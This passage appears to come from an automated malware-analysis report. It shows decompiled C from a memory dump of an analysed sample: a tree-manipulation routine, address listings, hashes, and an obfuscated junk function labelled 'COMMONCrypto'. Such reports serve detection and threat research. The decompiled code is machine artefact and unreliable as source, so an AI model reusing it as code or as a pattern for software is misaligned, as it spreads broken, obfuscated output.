										_t134 = _t182 ^ 0x00000001;
										_v16 = _t134;
										_t126 =  *(_t211 + _t134 * 4);
										if(_t194 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t211;
											}
										}
										if(_t126 != _t178) {
											goto L83;
										} else {
											_t167 = _t211 + 8;
											_t182 =  *_t167 & 0xfffffffc;
											_v20 = _t167;
											if(_t194 != 0) {
												if(_t182 == 0) {
													L80:
													_t126 = _a4;
													if( *_t126 != _t211) {
														goto L83;
													}
													 *_t126 = _t178;
													L34:
													if(_t194 != 0) {
														if(_t182 != 0) {
															_t182 = _t182 ^ _t178;
														}
													}
													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
													if(_t194 != 0) {
														if(_t139 == 0) {
															goto L37;
														}
														_t126 = _t139 ^ _t178;
														goto L36;
													} else {
														L36:
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t182 = _t167 & 0xfffffffc;
															if(_t194 != 0) {
																if(_t182 != 0) {
																	_t182 = _t182 ^ _t126;
																}
															}
															if(_t182 != _t178) {
																goto L83;
															} else {
																if(_t194 != 0) {
																	_t190 = _t126 ^ _t211;
																} else {
																	_t190 = _t211;
																}
																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
																_t167 = _v20;
																goto L37;
															}
														}
														L37:
														if(_t194 != 0) {
															if(_t139 != 0) {
																_t139 = _t139 ^ _t211;
															}
														}
														 *(_t211 + _v16 * 4) = _t139;
														_t187 = _t211 ^ _t178;
														if(_t194 != 0) {
															_t211 = _t187;
														}
														 *(_t178 + _v8 * 4) = _t211;
														if(_t194 == 0) {
															_t187 = _t178;
														}
														_t143 =  *_t167 & 0x00000003 | _t187;
														 *_t167 = _t143;
														_t117 = _t143 | 0x00000001;
														 *_t167 = _t117;
														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
														goto L42;
													}
												}
												_t182 = _t182 ^ _t211;
											}
											if(_t182 == 0) {
												goto L80;
											}
											_t144 =  *(_t182 + 4);
											if(_t194 != 0) {
												if(_t144 != 0) {
													_t144 = _t144 ^ _t182;
												}
											}
											if(_t144 == _t211) {
												if(_t194 != 0) {
													_t146 = _t182 ^ _t178;
												} else {
													_t146 = _t178;
												}
												 *(_t182 + 4) = _t146;
												goto L34;
											} else {
												_t126 =  *_t182;
												if(_t194 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t182;
													}
												}
												if(_t126 != _t211) {
													goto L83;
												} else {
													if(_t194 != 0) {
														_t148 = _t182 ^ _t178;
													} else {
														_t148 = _t178;
													}
													 *_t182 = _t148;
													goto L34;
												}
											}
										}
									}
								} else {
									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
									_t182 = _t211;
									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
									_t174 = _a4;
									_t117 =  *(_t211 + 8);
									_t181 = _t117 & 0xfffffffc;
									if(( *(_t174 + 4) & 0x00000001) != 0) {
										if(_t181 == 0) {
											goto L42;
										}
										_t178 = _t181 ^ _t211;
									}
									if(_t178 == 0) {
										goto L42;
									}
									goto L17;
								}
							}
							L17:
							 *(_t211 + 8) = _t117 | 0x00000001;
							_t40 = _t174 + 4; // 0x4
							_t117 =  *_t178;
							_t165 =  *_t40 & 0x00000001;
							if(_t165 != 0) {
								if(_t117 != 0) {
									_t117 = _t117 ^ _t178;
								}
							}
							_a12 = _t211 != _t117;
						} while (( *(_t178 + 8) & 0x00000001) != 0);
						goto L42;
					}
				}
			}

0x0302b095
0x0302b09b
0x0302b09f
0x0302b0a5
0x0302b0a7
0x0302b0aa
0x0302b0ad
0x0302b0b1
0x0302b3f8
0x0302b3fa
0x0302b3ff
0x0302b419
0x0302b41b
0x0302b41b
0x0302b401
0x00000000
0x0302b0b7
0x0302b0b9
0x0302b0bc
0x0302b0c0
0x0302b0c2
0x0302b0c2
0x0302b0c4
0x0302b0c8
0x0302b0cf
0x0302b0d1
0x0302b0d1
0x0302b0da
0x0302b0dd
0x0302b0df
0x0302b0df
0x0302b0e4
0x0302b0e9
0x0302b3e2
0x0302b3e5
0x0302b3eb
0x0307a676
0x0307a67b
0x0307a67d
0x0302b3f1
0x0302b3f1
0x0302b3f1
0x0302b0ef
0x0302b0ef
0x0302b0ef
0x0302b0e9
0x0302b0f6
0x0302b28d
0x0302b28e
0x0302b293
0x0302b0fc
0x0302b0fc
0x0302b101
0x0302b104
0x0302b107
0x0302b10c
0x0307a687
0x0307a68d
0x0307a68d
0x0307a687
0x0302b112
0x0302b116
0x0307a696
0x0307a69c
0x0307a69c
0x0307a696
0x0302b120
0x0302b121
0x0302b124
0x0302b127
0x0302b12a
0x0302b12d
0x0302b132
0x0307a6a5
0x00000000
0x00000000
0x0307a6ab
0x00000000
0x0302b138
0x0302b138
0x0302b13a
0x0302b193
0x0302b197
0x0302b19d
0x0302b29c
0x0302b29f
0x0302b2a2
0x0302b2a7
0x0307a6d2
0x0307a6d8
0x0307a6d8
0x0307a6d2
0x0302b2af
0x0302b420
0x0302b422
0x0302b423
0x00000000
0x0302b2b5
0x0302b2b5
0x0302b2ba
0x0307a6e1
0x0307a6e7
0x0307a6e7
0x0307a6e1
0x0302b2c2
0x00000000
0x0302b2c8
0x0302b2cb
0x0302b2d0
0x0307a6f0
0x0307a6f6
0x0307a6f6
0x0307a6f0
0x0302b2d8
0x00000000
0x0302b2de
0x0302b2de
0x0302b2de
0x0302b2e1
0x0302b2e6
0x0302b2eb
0x0307a6ff
0x0307a705
0x0307a705
0x0307a6ff
0x0302b2f3
0x00000000
0x0302b2f9
0x0302b2fb
0x0302b2fd
0x0302b301
0x0302b303
0x0302b303
0x0302b308
0x0302b30b
0x0302b310
0x0302b312
0x0302b312
0x0302b31c
0x0302b322
0x0302b327
0x0307a70e
0x0302b335
0x0302b337
0x0307a71d
0x0307a723
0x0307a723
0x0307a71d
0x0302b340
0x0302b345
0x0302b349
0x0307a72a
0x0307a72a
0x0302b352
0x0302b357
0x0302b359
0x0302b359
0x0302b365
0x0302b367
0x0302b36c
0x00000000
0x0302b36c
0x0307a714
0x0307a714
0x0302b32f
0x0302b3b8
0x0302b3bd
0x0302b3c4
0x0302b425
0x0302b427
0x0302b429
0x0302b429
0x0302b427
0x0302b3c8
0x00000000
0x00000000
0x0302b3ce
0x0302b42f
0x0302b3d0
0x0302b3d0
0x0302b3d0
0x0302b3d7
0x0302b3da
0x0302b3da
0x00000000
0x0302b32f
0x0302b2f3
0x0302b2d8
0x0302b2c2
0x0302b2af
0x0302b1a3
0x0302b1a9
0x0302b1af
0x0302b1b2
0x0302b1b5
0x0302b1b8
0x0307a733
0x0307a739
0x0307a739
0x0307a733
0x0302b1c0
0x00000000
0x0302b1c6
0x0302b1c8
0x0302b1cb
0x0302b1ce
0x0302b1d3
0x0307a742
0x0307a748
0x0307a748
0x0307a742
0x0302b1db
0x00000000
0x0302b1e1
0x0302b1e1
0x0302b1e6
0x0302b1e9
0x0302b1ee
0x0307a751
0x0302b409
0x0302b409
0x0302b40e
0x00000000
0x00000000
0x0302b410
0x0302b22d
0x0302b22f
0x0307a790
0x0307a796
0x0307a796
0x0307a790
0x0302b23d
0x0302b243
0x0302b248
0x0307a79f
0x00000000
0x00000000
0x0307a7a5
0x00000000
0x0302b24e
0x0302b24e
0x0302b250
0x0302b374
0x0302b379
0x0302b37e
0x0307a7ae
0x0307a7b4
0x0307a7b4
0x0307a7ae
0x0302b386
0x00000000
0x0302b38c
0x0302b38e
0x0307a7bd
0x0302b394
0x0302b394
0x0302b394
0x0302b39b
0x0302b39e
0x00000000
0x0302b39e
0x0302b386
0x0302b256
0x0302b258
0x0307a7c6
0x0307a7cc
0x0307a7cc
0x0307a7c6
0x0302b261
0x0302b266
0x0302b26a
0x0307a7d3
0x0307a7d3
0x0302b273
0x0302b278
0x0302b27a
0x0302b27a
0x0302b281
0x0302b283
0x0302b285
0x0302b287
0x0302b289
0x00000000
0x0302b289
0x0302b248
0x0307a757
0x0307a757
0x0302b1f6
0x00000000
0x00000000
0x0302b1fc
0x0302b201
0x0307a760
0x0307a766
0x0307a766
0x0307a760
0x0302b209
0x0302b3a8
0x0307a76f
0x0302b3ae
0x0302b3ae
0x0302b3ae
0x0302b3b0
0x00000000
0x0302b20f
0x0302b20f
0x0302b213
0x0307a778
0x0307a77e
0x0307a77e
0x0307a778
0x0302b21b
0x00000000
0x0302b221
0x0302b223
0x0307a787
0x0302b229
0x0302b229
0x0302b229
0x0302b22b
0x00000000
0x0302b22b
0x0302b21b
0x0302b209
0x0302b1db
0x0302b142
0x0302b142
0x0302b146
0x0302b148
0x0302b14c
0x0302b14f
0x0302b154
0x0302b15b
0x0307a6b4
0x00000000
0x00000000
0x0307a6ba
0x0307a6ba
0x0302b163
0x00000000
0x00000000
0x00000000
0x0302b163
0x0302b13a
0x0302b169
0x0302b16b
0x0302b16e
0x0302b171
0x0302b175
0x0302b178
0x0307a6c3
0x0307a6c9
0x0307a6c9
0x0307a6c3
0x0302b180
0x0302b184
0x00000000
0x0302b104
0x0302b0f6

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
Instruction ID: 2f0453835cfd617e1201b2caac7fe75632900399d76c9f66d5fb8228f02bbd23
Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
Instruction Fuzzy Hash: 9ED1F331B173268BCB65CE29C8C076EBFE9AF85214B2C89A9DC65CB345E771D841C790

Uniqueness

Uniqueness Score: -1.00%

Function 0041BD88, Relevance: .4, Instructions: 381
COMMONCrypto

Download Yara Rule

C-Code - Quality: 52%

			E0041BD88(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr __esi) {
				void* _t59;
				intOrPtr _t68;
				void* _t69;

				_t68 = __esi;
				_t59 = __eax;
				asm("adc eax, 0xc2a2b13e");
				if(_t69 + 1 != 0) {
					L1:
					asm("rcr dword [0xbba69d09], 0x0");
					asm("rol byte [0x720dc40a], 0x4b");
					asm("ror byte [0xafa61dc9], 0x48");
					 *0xaf4649b4 =  *0xaf4649b4 >> 0x81;
					asm("rcr byte [0x1f0b0ac6], 0x40");
					asm("sbb [0x88943f2], dl");
					 *0xb6b62111 =  *0xb6b62111 >> 0xc9;
					_push( *0x5c79ac2);
					 *0xdee0d3d = _t68;
					asm("adc ebx, 0x485105df");
					return _t59;
				} else {
					_push( *0x9e290275);
					if(__edi <= 0) {
						goto L1;
					} else {
						__edi =  *0x372fa7e * 0x4b69;
						 *0xc0d6b20d =  *0xc0d6b20d + __ecx;
						_pop(__ecx);
						__bl = __bl ^ 0x00000028;
						asm("adc edi, [0x28185564]");
						_t7 = __edx;
						__edx =  *0x8cfc1d0d;
						 *0x8cfc1d0d = _t7;
						__esi = __esi &  *0x8e903d16;
						asm("adc [0x55ab4a1d], esp");
						asm("sbb ebp, [0xf8f6b52d]");
						_t8 = __ebx;
						__ebx =  *0x35a861ea;
						 *0x35a861ea = _t8;
						asm("sbb ch, 0x3a");
						_pop(__ebx);
						__edi =  *0x372fa7e * 0x00004b69 ^  *0xf7a8121b;
						if(__edi >= 0) {
							goto L1;
						} else {
							__edx =  *0x481f137d * 0xff13;
							asm("rcr byte [0x52664838], 0x32");
							_push(__ecx);
							asm("scasb");
							_t11 = __esp;
							__esp =  *0xfe990d96;
							 *0xfe990d96 = _t11;
							asm("sbb ebp, [0x8abd096f]");
							__ebp =  *0xd281efc;
							__eax = __eax +  *0x1d8cfc1d;
							asm("sbb dh, [0xe5fd13e5]");
							__ch = __ch | 0x000000b4;
							__edi = __edi - 1;
							asm("adc [0xcfa45cb5], ch");
							__edi =  *0x655c9d61;
							__esp =  *0xfe990d96 - 1;
							__bl = __bl +  *0x3415bba0;
							__esp =  *0x599d2860 * 0x932b;
							__ebx = __ebx + 1;
							__edx =  *0x481f137d * 0x0000ff13 &  *0xc2f7f8b9;
							asm("stosb");
							if(__edx != 0) {
								goto L1;
							} else {
								asm("ror dword [0xefe46375], 0xc3");
								 *0x89a619ec =  *0x89a619ec << 0x5f;
								asm("ror dword [0x8bca5825], 0xeb");
								asm("rcl dword [0x5b2e7f6c], 0x80");
								 *0xaf7fb16f =  *0xaf7fb16f + __edi;
								if( *0xaf7fb16f < 0) {
									goto L1;
								} else {
									asm("adc [0xf7dde72], esp");
									__esi = __esi &  *0xc28142ea;
									if(__esi > 0) {
										goto L1;
									} else {
										 *0x8d11cd77 =  *0x8d11cd77 | __esi;
										 *0xba24f4d7 =  *0xba24f4d7 << 0x20;
										 *0x14f5c463 =  *0x14f5c463 & __dl;
										__bl = 0xa0;
										__edi = __edi +  *0xc41e4cf0;
										asm("scasb");
										if( *0x7149dc30 < __dl) {
											goto L1;
										} else {
											__ebx =  *0x1732467c * 0xe4dc;
											asm("sbb edx, [0xf9ed8eec]");
											 *0xf9b15d0f =  *0xf9b15d0f >> 0x50;
											_pop( *0xb7cbec35);
											asm("adc [0x160dd527], ebx");
											__dl = __dl ^ 0x000000e2;
											__edi =  *0x17f5c56b * 0xd4;
											 *0xbf6547d4 =  *0xbf6547d4 << 0x41;
											__ebx =  *0x7b39986a * 0x2550;
											asm("adc ebx, [0x5ee0ee85]");
											__ecx = __ecx & 0x7d2b8567;
											__eax =  *0x3b17c69e;
											__bl = 0x1c;
											__ebx = __eax;
											asm("sbb dh, 0x1c");
											__esp =  *0x8846f0d3;
											asm("sbb esi, [0xf93a586d]");
											_pop(__ecx);
											 *0x227400f8 = __ebx;
											_t20 = __ch;
											__ch =  *0x69ea12c6;
											 *0x69ea12c6 = _t20;
											asm("movsw");
											asm("stosd");
											if(( *0x9c6c0e2a & __cl) >= 0) {
												goto L1;
											} else {
												 *0x6a354373 =  *0x6a354373 << 0x5f;
												_push(__ecx);
												 *0x9d0170dc =  *0x9d0170dc >> 0x5f;
												__esp =  *0xab27bcfa;
												 *0xd99c18ef =  *0xd99c18ef ^ __ebp;
												__esi = __esi &  *0xe57aca35;
												asm("rol dword [0x5e7614c4], 0xed");
												asm("sbb edi, [0xe2a88fbc]");
												__ebp =  *0xb5db476a * 0xe1ad;
												 *0xe100f1c5 =  *0xe100f1c5 ^ __esp;
												if( *0xe100f1c5 != 0) {
													goto L1;
												} else {
													 *0xcb72cb75 =  *0xcb72cb75 << 0x1f;
													__ebx = __ebx + 1;
													asm("scasd");
													__edx = __edx - 0x78b17411;
													asm("adc ecx, [0x2cee2df]");
													_pop(__ecx);
													_t27 = __edx;
													__edx =  *0xf26d597;
													 *0xf26d597 = _t27;
													 *0x2bbe0aa3 =  *0x2bbe0aa3 >> 0x43;
													if( *0xc7046c38 < __dl) {
														goto L1;
													} else {
														__esi =  *0xd0b52c7c * 0x3014;
														 *0x2d10a8f9 =  *0x2d10a8f9 ^ __dh;
														__ch = 0xa8;
														asm("rcr dword [0xc98f0c94], 0x5");
														__edi = __edi |  *0x69b57cb;
														if(__edi < 0) {
															goto L1;
														} else {
															 *0x7d0bec70 =  *0x7d0bec70 ^ __ecx;
															_push( *0xb52a7c23);
															__ebx = __ebx - 0xff68259e;
															asm("lodsd");
															if(__ebx == 0) {
																goto L1;
															} else {
																asm("rol dword [0x8e6f0c74], 0x42");
																__ecx = 0x9eb6d965;
																__eax = __eax ^  *0x25e52ff8;
																asm("adc [0x5212892b], eax");
																__ebx = __ebx &  *0x406975f5;
																asm("adc edi, [0xd9ec8087]");
																__edi = __edi + 0x898ee7d6;
																asm("sbb [0xac1fb2bb], eax");
																asm("adc bh, 0xb5");
																_push(__edi);
																__edi = __edi - 0x6a6110f;
																if(__edi != 0) {
																	goto L1;
																} else {
																	 *0x7f6b2675 =  *0x7f6b2675 - __eax;
																	asm("sbb edx, 0x657a4d0d");
																	__esi = __esi + 0xc9abcfd;
																	__esi = __esi &  *0x1d0d2819;
																	_pop( *0x630c8cfc);
																	asm("movsb");
																	 *0xbbe82186 =  *0xbbe82186 ^ __bh;
																	asm("adc ah, [0x25e52f10]");
																	 *0xb111892b =  *0xb111892b | 0x9eb6d965;
																	__ebx =  *0xda43ea01;
																	asm("sbb eax, [0x6dbfd71f]");
																	 *0x8964d293 =  *0x8964d293 << 0x85;
																	 *0xa3cd1229 =  *0xa3cd1229 + __ebx;
																	asm("adc ecx, [0x784e020f]");
																	__ebp =  *0xb9c18069 * 0xc5e5;
																	__ebx = __ebx +  *0xb50df5c2;
																	__ebx = __ebx ^  *0xb6e6321;
																	asm("sbb [0x2824c4a2], dh");
																	 *0x905c0a0a =  *0x905c0a0a << 0x15;
																	 *0xd7a48181 = __ebp;
																	__edi = __edi ^  *0x14a8f08b;
																	if(__edi < 0) {
																		goto L1;
																	} else {
																		__ebx = __ebx ^  *0x7fa6ba78;
																		__ebx = __ebx &  *0x65e6f917;
																		asm("sbb ebp, 0xf623cd8d");
																		__dh = __dh ^ 0x00000032;
																		_push( *0xece4dc26);
																		 *0x1bf9ed8e =  *0x1bf9ed8e ^ __esp;
																		if( *0x1bf9ed8e > 0) {
																			goto L1;
																		} else {
																			__ecx = 0xfffffffff5cf26ee;
																			asm("sbb esi, 0xb0a7cf6e");
																			__eax = __eax +  *0xf0252bd9;
																			asm("cmpsb");
																			_push(0x10e6b40e);
																			__eax = __eax &  *0xbc6bbf83;
																			__ebx = __ebx +  *0xdd193aea;
																			if(__ebx > 0) {
																				goto L1;
																			} else {
																				__edx = __edx + 1;
																				__edi = __edi &  *0x7a1e0087;
																				_pop(__eax);
																				 *0xfb4b9521 =  *0xfb4b9521 | __ebx;
																				asm("sbb bh, 0x1a");
																				asm("scasb");
																				 *0x94441196 =  *0x94441196 >> 0x18;
																				asm("sbb ch, [0xc1e235e3]");
																				asm("rcr byte [0xf5a95bb2], 0x2e");
																				__esp = __esp - 0x6c380a37;
																				 *0x14a3c704 =  *0x14a3c704 - __dh;
																				__esi = __esi ^  *0x59949a65;
																				 *0xe4ee6587 =  *0xe4ee6587 ^ __esi;
																				asm("sbb esi, [0xf9ed8eec]");
																				asm("rol dword [0xe816040d], 0xd2");
																				 *0x357a2e63 =  *0x357a2e63 << 0xf1;
																				asm("ror byte [0xfc1d0d28], 0xe4");
																				__ebx = __ebx -  *0xcc780c8c;
																				__bh = __bh | 0x0000000a;
																				asm("adc ecx, [0x2b25e52f]");
																				asm("adc ebx, [0x382a1789]");
																				 *0xf6c6a12 =  *0xf6c6a12 & __ah;
																				__edx =  *0x181962ff;
																				_push( *0xec01f52d);
																				asm("rol byte [0x34b97fb6], 0x7d");
																				asm("adc ch, [0x9c6c0e2a]");
																				asm("sbb al, [0xbd75b70a]");
																				asm("adc esp, [0xef3e25d6]");
																				__ecx = 0xfffffffff5cf26ef;
																				 *0xb2bba004 =  *0xb2bba004 | 0x000000a0;
																				 *0xcefac1f =  *0xcefac1f ^ __eax;
																				__ebx =  *0x2707b260 * 0xf80f;
																				asm("scasd");
																				__edx =  *0x181962ff - 1;
																				__esi = __esi |  *0x8928cf3e;
																				__ebx = 0xca57ad1d +  *0x2707b260 * 0xf80f;
																				__ebx = 0xca57ad1d +  *0x2707b260 * 0xf80f - 0xd44ffa25;
																				__eax = __eax &  *0xebe9bdf3;
																				_push( *0x49c1e8b9);
																				asm("rol dword [0x9d3876fd], 0x64");
																				_push(__edi);
																				asm("cmpsb");
																				__ebp = __ebp +  *0xbba04c65;
																				 *0x23c03f16 =  *0x23c03f16 | __eax;
																				__esp = __esp + 1;
																				__ecx = 0xfffffffff5cf26ee;
																				__edx =  *0x181962ff - 0x00000001 & 0xaad6b036;
																				 *0xc1c6f8e0 =  *0xc1c6f8e0 >> 0x9b;
																				__esp = __esp |  *0xa78ba736;
																				if(__esp > 0) {
																					goto L1;
																				} else {
																					__ecx =  *0xde72af7f * 0x127d;
																					if(__ecx < 0) {
																						goto L1;
																					} else {
																						__esi = __esi -  *0x46588a70;
																						__edi =  *0xfac7c16a * 0xa7f9;
																						 *0xbb9af012 =  *0xbb9af012 ^ 0x000000a8;
																						 *0xefac1fb2 =  *0xefac1fb2 << 0x75;
																						 *0x2f32ea0f =  *0x2f32ea0f | __edx;
																						if( *0x2f32ea0f < 0) {
																							goto L1;
																						} else {
																							__ebp =  *0xe992367c * 0xbd7a;
																							__dl = __dl - 0xe2;
																							__edi = __edi |  *0x3cff15f5;
																							__ecx = __ecx -  *0x819a0526;
																							__eax = __eax +  *0x6cddeb9e;
																							asm("stosb");
																							__esp = 0x98ee7189;
																							__al = __al | 0x000000d0;
																							__esp = 0x98ee7189 &  *0xa619ecef;
																							asm("sbb esi, [0x2ce11889]");
																							 *0x6531f762 =  *0x6531f762 >> 0xde;
																							asm("rcr dword [0xbfde9fbc], 0xa7");
																							__ecx = __ecx + 1;
																							asm("stosd");
																							__ebp = 1 +  *0xe992367c * 0xbd7a;
																							asm("cmpsb");
																							 *0x3e2a88f = 0x1acc1326;
																							asm("lodsb");
																							 *0xa7671913 =  *0xa7671913 << 0x7d;
																							__ebp =  *0x82742e6a * 0xa3c5;
																							__cl = __cl - 0x88;
																							__ebx = __ebx - 1;
																							asm("rol dword [0x96ae1afb], 0x73");
																							__esp = (0x98ee7189 &  *0xa619ecef) - 0x1fe37b0f;
																							_pop(__ebp);
																							asm("sbb [0xba24dc9e], ecx");
																							 *0x14f5c463 =  *0x14f5c463 >> 0x40;
																							__ebx =  *0x41bbba60 * 0xd174;
																							_push( *0x82742e6a * 0xa3c5);
																							__ebp =  *0x8057216b * 0x614f;
																							asm("sbb ebx, 0xece4e13d");
																							__edi = __edi + 1;
																							asm("scasd");
																							__edx = __edx + 1;
																							__edx = __edx &  *0x1f922099;
																							asm("adc [0x355a7031], ebp");
																							asm("sbb ebp, 0x3353adc7");
																							_push( *0xe17ce31);
																							__ebx =  *0x9513bf17;
																							asm("rol dword [0x4c281789], 0xcd");
																							asm("ror dword [0x53f1c12b], 0x2");
																							asm("sbb [0xd320fae7], bh");
																							 *0xc2d4c7ff = __esi;
																							__dl = __dl | 0x0000002a;
																							__ecx = 0xc69c6c0e;
																							_pop( *0x4850e517);
																							__bl = 0xffffffffffffff39;
																							asm("sbb edx, [0xc412831b]");
																							__esi = __esi & 0x458c7a39;
																							__edi = __edi &  *0xe2a062e;
																							__ebx =  *0x14c69c6c;
																							__eax = __eax ^  *0x7d4002c2;
																							asm("rcr dword [0x511e1929], 0xa5");
																							 *0x32757a3f =  *0x32757a3f & 0xc69c6c0e;
																							asm("lodsb");
																							asm("adc cl, [0xece4f208]");
																							asm("sbb [0xcf9ed8e], eax");
																							asm("sbb [0x9164e10], al");
																							__edx = __edx | 0x1fa092ba;
																							__esp =  *0x8912f7c0;
																							_push(0x31de560f);
																							asm("sbb dl, [0x92a3c51c]");
																							asm("adc [0xf5c463ba], eax");
																							__esp =  *0x8912f7c0 -  *0x4e78360f;
																							_push( *0xb19d553e);
																							__ecx = 0xc69c6c0e -  *0x249239fc;
																							asm("adc edx, [0xf5c463ba]");
																							_t54 = __dh;
																							__dh =  *0x8844c414;
																							 *0x8844c414 = _t54;
																							if(0xc69c6c0e > 0) {
																								goto L1;
																							} else {
																								asm("sbb esi, [0xcca37977]");
																								__esp =  *0xb659bfbe;
																								__ebp = 0x6a812398;
																								__dl = __dl - 0xf9;
																								__ebp =  *0x4f64390e;
																								 *0x4f64390e = 0x6a812398;
																								asm("scasd");
																								__edi = __edi - 0x98bc263f;
																								if(__edi <= 0) {
																									goto L1;
																								} else {
																									__eax = __eax ^ 0x013aed76;
																									_push(__ecx);
																									 *0xaf0eb7 =  *0xaf0eb7 << 0xaf;
																									if(__ebx <= 0) {
																										goto L1;
																									} else {
																										 *0xc86d1876 =  *0xc86d1876 - __edi;
																										_pop(__ebp);
																										__esp =  *0xf01f9295;
																										__edi = __edi - 1;
																										 *0xd8d0db7 =  *0xd8d0db7 | __dl;
																										_push(__eax);
																										_t58 = __esi;
																										__esi =  *0xf07495d5;
																										 *0xf07495d5 = _t58;
																										 *0x1d0d2812 =  *0x1d0d2812 >> 0x1b;
																										 *0xde068cfc =  *0xde068cfc +  *0xf07495d5;
																										asm("sbb [0xed3073f4], edx");
																										__al = __al | 0x000000ca;
																										return __eax;
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x0041bd88
0x0041bd88
0x0041bd88
0x0041bd8e
0x0041b466
0x0041b466
0x0041b473
0x0041b483
0x0041b491
0x0041b498
0x0041b49f
0x0041b4a5
0x0041b4ae
0x0041b4ba
0x0041b4c3
0x0041b4c9
0x0041bd94
0x0041bd94
0x0041bda0
0x00000000
0x0041bda6
0x0041bda6
0x0041bdbc
0x0041bdc2
0x0041bdc3
0x0041bdc6
0x0041bdcc
0x0041bdcc
0x0041bdcc
0x0041bdd2
0x0041bdd8
0x0041bdde
0x0041bde4
0x0041bde4
0x0041bde4
0x0041bdea
0x0041bded
0x0041bdee
0x0041bdf4
0x00000000
0x0041bdfa
0x0041bdfa
0x0041be0a
0x0041be11
0x0041be18
0x0041be19
0x0041be19
0x0041be19
0x0041be1f
0x0041be25
0x0041be2b
0x0041be31
0x0041be3d
0x0041be40
0x0041be4d
0x0041be53
0x0041be59
0x0041be5a
0x0041be60
0x0041be6a
0x0041be6b
0x0041be71
0x0041be72
0x00000000
0x0041be78
0x0041be78
0x0041be7f
0x0041be8c
0x0041be93
0x0041bea0
0x0041bea6
0x00000000
0x0041beac
0x0041beac
0x0041beb2
0x0041beb8
0x00000000
0x0041bebe
0x0041bebe
0x0041bec4
0x0041becb
0x0041bed1
0x0041bed3
0x0041bed9
0x0041bee0
0x00000000
0x0041bee6
0x0041bee6
0x0041bef0
0x0041bef6
0x0041befd
0x0041bf03
0x0041bf09
0x0041bf0c
0x0041bf16
0x0041bf1e
0x0041bf28
0x0041bf2e
0x0041bf34
0x0041bf39
0x0041bf3c
0x0041bf43
0x0041bf46
0x0041bf47
0x0041bf4d
0x0041bf4e
0x0041bf5a
0x0041bf5a
0x0041bf5a
0x0041bf60
0x0041bf62
0x0041bf63
0x00000000
0x0041bf69
0x0041bf69
0x0041bf70
0x0041bf71
0x0041bf78
0x0041bf7e
0x0041bf90
0x0041bf96
0x0041bf9d
0x0041bfac
0x0041bfb6
0x0041bfbc
0x00000000
0x0041bfc2
0x0041bfc2
0x0041bfc9
0x0041bfd0
0x0041bfd7
0x0041bfdd
0x0041bfe3
0x0041bfe4
0x0041bfe4
0x0041bfe4
0x0041bff0
0x0041bff7
0x00000000
0x0041bffd
0x0041bffd
0x0041c007
0x0041c013
0x0041c015
0x0041c01c
0x0041c022
0x00000000
0x0041c028
0x0041c028
0x0041c02e
0x0041c034
0x0041c03a
0x0041c03b
0x00000000
0x0041c041
0x0041c041
0x0041c048
0x0041c04d
0x0041c053
0x0041c059
0x0041c05f
0x0041c065
0x0041c06b
0x0041c083
0x0041c086
0x0041c08d
0x0041c093
0x00000000
0x0041c099
0x0041c099
0x0041c0ab
0x0041c0b1
0x0041c0b7
0x0041c0bd
0x0041c0c3
0x0041c0c4
0x0041c0ca
0x0041c0d0
0x0041c0d6
0x0041c0dc
0x0041c0e2
0x0041c0e9
0x0041c0ef
0x0041c0f5
0x0041c105
0x0041c10b
0x0041c111
0x0041c11d
0x0041c124
0x0041c12a
0x0041c130
0x00000000
0x0041c136
0x0041c136
0x0041c13c
0x0041c142
0x0041c148
0x0041c14b
0x0041c151
0x0041c157
0x00000000
0x0041c15d
0x0041c15d
0x0041c163
0x0041c169
0x0041c16f
0x0041c170
0x0041c175
0x0041c17b
0x0041c181
0x00000000
0x0041c187
0x0041c18d
0x0041c18e
0x0041c197
0x0041c19e
0x0041c1a4
0x0041c1a7
0x0041c1a8
0x0041c1af
0x0041c1b5
0x0041c1bc
0x0041c1c2
0x0041c1d4
0x0041c1da
0x0041c1e0
0x0041c1e6
0x0041c1ed
0x0041c1f7
0x0041c1fe
0x0041c20a
0x0041c20d
0x0041c213
0x0041c219
0x0041c21f
0x0041c225
0x0041c22b
0x0041c232
0x0041c23e
0x0041c244
0x0041c24a
0x0041c24b
0x0041c251
0x0041c257
0x0041c261
0x0041c262
0x0041c263
0x0041c269
0x0041c26f
0x0041c275
0x0041c27b
0x0041c281
0x0041c288
0x0041c289
0x0041c290
0x0041c296
0x0041c29c
0x0041c29d
0x0041c29e
0x0041c2a4
0x0041c2ab
0x0041c2b1
0x00000000
0x0041c2b7
0x0041c2b7
0x0041c2c1
0x00000000
0x0041c2c7
0x0041c2c7
0x0041c2cd
0x0041c2d7
0x0041c2dd
0x0041c2e4
0x0041c2ea
0x00000000
0x0041c2f0
0x0041c2f0
0x0041c2fa
0x0041c303
0x0041c309
0x0041c30f
0x0041c315
0x0041c316
0x0041c31c
0x0041c31e
0x0041c324
0x0041c32f
0x0041c336
0x0041c33d
0x0041c33e
0x0041c341
0x0041c342
0x0041c343
0x0041c349
0x0041c34a
0x0041c351
0x0041c361
0x0041c364
0x0041c365
0x0041c36c
0x0041c372
0x0041c379
0x0041c37f
0x0041c386
0x0041c390
0x0041c391
0x0041c39b
0x0041c3a7
0x0041c3a8
0x0041c3af
0x0041c3b0
0x0041c3bc
0x0041c3c2
0x0041c3c8
0x0041c3d4
0x0041c3da
0x0041c3e1
0x0041c3e8
0x0041c3ee
0x0041c3f9
0x0041c3fc
0x0041c402
0x0041c408
0x0041c40b
0x0041c411
0x0041c41d
0x0041c423
0x0041c429
0x0041c42f
0x0041c436
0x0041c43c
0x0041c43d
0x0041c443
0x0041c449
0x0041c44f
